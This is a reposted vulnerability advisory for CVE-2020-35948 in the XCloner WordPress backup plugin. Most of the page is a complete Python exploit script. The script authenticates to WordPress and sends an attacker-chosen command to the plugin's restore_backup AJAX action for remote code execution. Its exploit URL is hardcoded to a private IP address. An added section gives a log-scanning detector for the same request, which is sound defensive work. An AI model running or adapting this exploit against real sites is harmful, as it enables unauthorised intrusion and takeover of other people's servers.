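WordPress XCloner Backup and Restore plugin security vulnerability
Vulnerability ID | 2305146 | Vulnerability type | Other |
Published | 2021-07-02 | Updated | 2021-07-02 |
CVE-2020-35948 |
CNNVD-202012-1890 |
Affected platform | N/A | CVSS score | N/A |
|Vulnerability source
|Vulnerability details
WordPress is a blogging platform developed in PHP by the WordPress Foundation. The platform supports setting up personal blog sites on servers running PHP and MySQL. The XCloner Backup and Restore plugin before 4.2.13 for WordPress contains a security vulnerability that allows an authenticated attacker to modify arbitrary files, including PHP files. An attacker can exploit this vulnerability to achieve remote code execution.
|Vulnerability exploit (EXP)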
# Exploit Title: WordPress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md
'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files,
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php,
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
'''
'''
Banner:
'''
banner = """
##### # # ####### ##### ### ##### ### ##### ####### ##### # #####
# # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # #
# # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # #####
# # # # # # # # # # # # # ####### # #
# # # # # # # # # # # # # # # # # # # #
##### # ####### ####### ### ####### ### ##### ##### ##### # #####
by @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
ajax_cmd = input('[*] Ajax Command to execute: ')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header= auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()
'''
Exploit:
'''
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"
header = {
"Accept": "*/*",
"Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
"Connection": "close"
}
# Body:
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)
exploit = session.post(url_exploit, headers=header, data=body)
print('')
print(exploit.text)
print('')
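A defender-side check for the request shown above, as an added example that is not part of the original page or the exploit author's code: it scans web access logs for POST requests to admin-ajax.php with action=restore_backup and tests an installed plugin version against the fixed release 4.2.13. The log lines are constructed samples, and the function names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2021:10:02:11 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jul/2021:10:02:12 +0000] "POST /wordpress//wp-admin/admin-ajax.php?action=restore_backup HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
198.51.100.4 - - [01/Jul/2021:10:05:40 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jul/2021:10:06:00 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=restore_backup HTTP/1.1" 400 1 "-" "curl/7.68.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
FIXED = (4, 2, 13)  # first fixed plugin version according to the advisory text


def is_vulnerable(version):
    """True for XCloner versions before 4.2.13 (dotted numeric versions only)."""
    parts = tuple(int(p) for p in version.split("."))
    parts += (0,) * (3 - len(parts))  # pad "4.3" to (4, 3, 0)
    return parts < FIXED


def find_restore_calls(log_text):
    """Return (ip, timestamp, status) for POSTs to admin-ajax.php with action=restore_backup."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path, _, query = m["target"].partition("?")
        # Collapse duplicate slashes so "//wp-admin" still matches.
        path = re.sub(r"/{2,}", "/", path)
        if not path.endswith("/wp-admin/admin-ajax.php"):
            continue
        if "restore_backup" in parse_qs(query).get("action", []):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in find_restore_calls(SAMPLE_LOG):
        print("restore_backup POST:", hit)
    print("4.2.12 vulnerable:", is_vulnerable("4.2.12"))
```

Standard access logs do not record the POST body, so the `xcloner_action` value is not visible here; on sites still running a version before 4.2.13, treat each hit as a lead for reviewing which account made the request and which files changed around that time.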
|References
Source: MISC
Link: https://www.wordfence.com/blog/2020/09/critical-vulnerabilities-patched-in-xcloner-backup-and-restore-plugin/
Source: MISC
Link: https://wpscan.com/vulnerability/10412
Source: nvd.nist.gov
Link: https://nvd.nist.gov/vuln/detail/CVE-2020-35948
This article was originally written by 华域联盟: 华域联盟 » WordPress XCloner Backup and Restore plugin security vulnerability
When reposting, please retain the source and the original link: https://www.cnhackhy.com/97301.htm